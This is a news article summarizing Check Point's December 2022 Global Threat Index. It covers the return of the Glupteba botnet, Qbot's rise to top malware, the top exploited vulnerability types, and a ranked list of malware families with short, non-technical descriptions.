Leading cybersecurity vendor Check Point Software Technologies has published its latest Global Threat Index for December 2022 in which the Glupteba malware, an ambitious blockchain-enabled Trojan botnet, returned to the top ten list for the first time since July last year.
Qbot, a sophisticated Trojan that steals banking credentials and keystrokes, overtook Emotet as the most prevalent malware after its December 2022 return, impacting 7 percent of organizations worldwide.
Android malware Hiddad also made a comeback, with education continuing as the most impacted industry worldwide.
Maya Horowitz, vice president for research at Check Point Software said: “The overwhelming theme from our latest research is how malware often masquerades as legitimate software to give hackers backdoor access to devices without raising suspicion. That is why it is important to do your due diligence when downloading any software and applications or clicking on links, regardless of how genuine they look.”
Although Google disrupted Glupteba operations in December 2021, the malware has sprung back into action.
As a modular malware variant, Glupteba can achieve various objectives on an infected computer and often used as a downloader and dropper for other malware. This means that a Glupteba infection could lead to a ransomware infection, data breach, or other security incidents.
Glupteba is also designed to steal user credentials and session cookies from infected machines. This authentication data can be used to gain access to a user’s online accounts or other systems, enabling the attacker to steal sensitive data or take other action using the compromised accounts.
Finally, the malware is commonly used to deploy cryptomining functions on its target, draining a computer’s resources by using them to mine blocks.
In December, the cybersecurity company also saw Hiddad make the top three mobile malware list for the first time in 2022.
Hiddad is an ad-distributing malware, targeting android devices. It repackages legitimate apps and then releases them to a third-party store. Its main function is to display ads, but it can also gain access to key security details built into the OS.
The overwhelming theme from the cybersecurity’s latest research is how malware often masquerades as legitimate software to give hackers backdoor access to devices without raising suspicion.
That is why it is important to do due diligence when downloading any software and applications or clicking on links, regardless of how genuine they look.
Its research also revealed that “Web Server Exposed Git Repository Information Disclosure” was the most common exploited vulnerability, impacting 46 percent of organizations globally, followed by “Web Servers Malicious URL Directory Traversal” with 44 percent of organizations impacted worldwide.
“Command Injection Over HTTP” is the third most used vulnerability, with a global impact of 43 percent.
The following were tracked as the most prevalent malware during the period. Arrows indicate rank change.
- ↑ Qbot – Qbot aka Qakbot is a banking Trojan that first appeared in 2008. It was designed to steal a user’s banking credentials and keystrokes. Often distributed via spam email, Qbot employs several anti-VM, anti-debugging, and anti-sandbox techniques to hinder analysis and evade detection.
- ↔ Emotet – Emotet is an advanced, self-propagate and modular Trojan. Emotet used to be employed as a banking Trojan, and recently was used as a distributor for other malware or malicious campaigns. It uses multiple methods for maintaining persistence and evasion techniques to avoid detection. In addition, it can be spread through phishing spam emails containing malicious attachments or links.
- ↑ XMRig – XMRig is open-source CPU mining software used to mine the Monero cryptocurrency. Threat actors often abuse this open-source software by integrating it into their malware to conduct illegal mining on victims’ devices.
- ↑ Formbook – Formbook is an Infostealer targeting the Windows OS and was first detected in 2016. It is marketed as Malware as a Service (MaaS) in underground hacking forums for its strong evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to orders from its C&C.
- ↑ Nanocore – NanoCore is a Remote Access Trojan that targets Windows operating system users and was first observed in the wild in 2013. All versions of the RAT contain basic plugins and functionalities such as screen capture, crypto currency mining, remote control of the desktop and webcam session theft.
- ↑ Ramnit – Ramnit is a modular banking Trojan first discovered in 2010. Ramnit steals web session information, giving its operators the ability to steal account credentials for all services used by the victim, including bank accounts, and corporate and social networks accounts. The Trojan uses both hardcoded domains as well as domains generated by a DGA (Domain Generation Algorithm) to contact the C&C server and download additional modules.
- ↑ Remcos – Remcos is a RAT that first appeared in the wild in 2016. Remcos distributes itself through malicious Microsoft Office documents, which are attached to SPAM emails, and is designed to bypass Microsoft Windowss UAC security and execute malware with high-level privileges.
- ↑ Glupteba – Known since 2011, Glupteba is a backdoor that gradually matured into a botnet. By 2019 it included a C&C address update mechanism through public BitCoin lists, an integral browser stealer capability and a router exploiter.
- ↓ AgentTesla – AgentTesla is an advanced RAT functioning as a keylogger and information stealer, which is capable of monitoring and collecting the victim’s keyboard input, system keyboard, taking screenshots, and exfiltrating credentials to a variety of software installed on a victim’s machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).
- ↓ Phorpiex – Phorpiex is a botnet (aka Trik) that has been active since 2010 and at its peak controlled more than a million infected hosts. It is known for distributing other malware families via spam campaigns as well as fueling large-scale spam and sextortion campaigns.
